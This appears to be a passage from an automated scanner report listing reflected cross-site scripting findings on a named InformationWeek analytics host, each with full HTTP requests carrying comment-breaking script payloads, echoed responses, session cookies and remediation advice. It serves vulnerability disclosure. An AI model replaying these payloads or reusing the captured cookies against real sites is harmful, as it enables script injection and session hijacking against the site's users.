<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F25%2FVirtualizationc7bf7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebda4b5fc76c%2FVirtualization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/25/Virtualizationc7bf7--><script>alert(1)</script>bda4b5fc76c/Virtualization.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload b89df--><script>alert(1)</script>f19f7b9ea68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/25/Virtualization/Virtualization.htmlb89df--><script>alert(1)</script>f19f7b9ea68 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:44 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... n%2FVirtualization.htmlb89df--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef19f7b9ea68&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.htmlb89df--><script>alert(1)</script>f19f7b9ea68"> ...[SNIP]...
3.120. http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/25/Virtualization/Virtualization.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cf3d0--><script>alert(1)</script>502191a651d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/25/Virtualization/Virtualization.html?cf3d0--><script>alert(1)</script>502191a651d=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ualization.html%3Fcf3d0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E502191a651d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/25/Virtualization/Virtualization.html?cf3d0--><script>alert(1)</script>502191a651d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8b8ac--><script>alert(1)</script>f567cd8b359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu8b8ac--><script>alert(1)</script>f567cd8b359/5/Cloud-computing/Cloud-computing.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nweek.com%2Fmenu8b8ac--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef567cd8b359%2F5%2FCloud-computing%2FCloud-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu8b8ac--><script>alert(1)</script>f567cd8b359/5/Cloud-computing/Cloud-computing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2de8a--><script>alert(1)</script>954aea6cb45 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/52de8a--><script>alert(1)</script>954aea6cb45/Cloud-computing/Cloud-computing.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:59 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:59 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eek.com%2Fmenu%2F52de8a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E954aea6cb45%2FCloud-computing%2FCloud-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/52de8a--><script>alert(1)</script>954aea6cb45/Cloud-computing/Cloud-computing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 69059--><script>alert(1)</script>b91529cd1fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/5/Cloud-computing69059--><script>alert(1)</script>b91529cd1fc/Cloud-computing.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:06 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:06 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F5%2FCloud-computing69059--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb91529cd1fc%2FCloud-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/5/Cloud-computing69059--><script>alert(1)</script>b91529cd1fc/Cloud-computing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload bd15c--><script>alert(1)</script>fde2a4d4446 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/5/Cloud-computing/Cloud-computing.htmlbd15c--><script>alert(1)</script>fde2a4d4446 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FCloud-computing.htmlbd15c--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efde2a4d4446&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.htmlbd15c--><script>alert(1)</script>fde2a4d4446"> ...[SNIP]...
3.125. http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/5/Cloud-computing/Cloud-computing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4fcd7--><script>alert(1)</script>93ce3681f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/5/Cloud-computing/Cloud-computing.html?4fcd7--><script>alert(1)</script>93ce3681f9c=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... computing.html%3F4fcd7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E93ce3681f9c%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/5/Cloud-computing/Cloud-computing.html?4fcd7--><script>alert(1)</script>93ce3681f9c=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4ec85--><script>alert(1)</script>95d6bed190e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu4ec85--><script>alert(1)</script>95d6bed190e/6/Data-center/Data-center.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:54 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... formationweek.com%2Fmenu4ec85--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E95d6bed190e%2F6%2FData-center%2FData-center.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu4ec85--><script>alert(1)</script>95d6bed190e/6/Data-center/Data-center.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload acd84--><script>alert(1)</script>2bca18b689e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/6acd84--><script>alert(1)</script>2bca18b689e/Data-center/Data-center.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:05 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rmationweek.com%2Fmenu%2F6acd84--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2bca18b689e%2FData-center%2FData-center.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/6acd84--><script>alert(1)</script>2bca18b689e/Data-center/Data-center.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload f6a66--><script>alert(1)</script>055e09556d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/6/Data-centerf6a66--><script>alert(1)</script>055e09556d3/Data-center.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... com%2Fmenu%2F6%2FData-centerf6a66--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E055e09556d3%2FData-center.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/6/Data-centerf6a66--><script>alert(1)</script>055e09556d3/Data-center.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 7d1b6--><script>alert(1)</script>13b07e66f14 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/6/Data-center/Data-center.html7d1b6--><script>alert(1)</script>13b07e66f14 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:29 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Data-center%2FData-center.html7d1b6--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E13b07e66f14&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/6/Data-center/Data-center.html7d1b6--><script>alert(1)</script>13b07e66f14"> ...[SNIP]...
3.130. http://analytics.informationweek.com/menu/6/Data-center/Data-center.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/6/Data-center/Data-center.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b2ddb--><script>alert(1)</script>59b4ad09867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/6/Data-center/Data-center.html?b2ddb--><script>alert(1)</script>59b4ad09867=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ter%2FData-center.html%3Fb2ddb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E59b4ad09867%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/6/Data-center/Data-center.html?b2ddb--><script>alert(1)</script>59b4ad09867=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload eb9ee--><script>alert(1)</script>3971533e5ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menueb9ee--><script>alert(1)</script>3971533e5ec/7/Enterprise-software/Enterprise-software.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenueb9ee--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3971533e5ec%2F7%2FEnterprise-software%2FEnterprise-software.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menueb9ee--><script>alert(1)</script>3971533e5ec/7/Enterprise-software/Enterprise-software.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6530f--><script>alert(1)</script>0f554b3848a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/76530f--><script>alert(1)</script>0f554b3848a/Enterprise-software/Enterprise-software.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:24 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45941
